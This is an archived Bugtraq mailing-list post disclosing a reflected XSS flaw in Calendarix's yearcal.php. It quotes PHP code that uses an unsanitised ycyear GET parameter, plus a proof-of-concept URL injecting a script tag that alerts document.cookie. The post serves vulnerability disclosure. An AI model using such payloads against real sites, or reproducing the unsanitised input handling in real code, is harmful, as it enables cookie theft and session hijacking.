[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Calendarix "yearcal.php" XSS Attacking

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Calendarix "yearcal.php" XSS Attacking
From: botan@xxxxxxxxxxxxx
Date: 16 Apr 2006 17:50:57 -0000

Website : http://www.calendarix.com

Vulnerable : 

if (!isset($_GET['ycyear']))
  $ycyear = $y ;
else
  $ycyear = $_GET['ycyear'];

http://www.site.com/[path]/yearcal.php?ycyear=<script>alert(document.cookie)</script>

Prev by Date: FlexBB v0.5.5 BETA [SQL Inj] [XSS] [Login bypass]
Next by Date: Re: Snipe Gallery <= 3.1.4 Multiple XSS
Previous by thread: FlexBB v0.5.5 BETA [SQL Inj] [XSS] [Login bypass]
Next by thread: MyEvent Remote File Execution And XSS Attacking
Index(es):
- Date
- Thread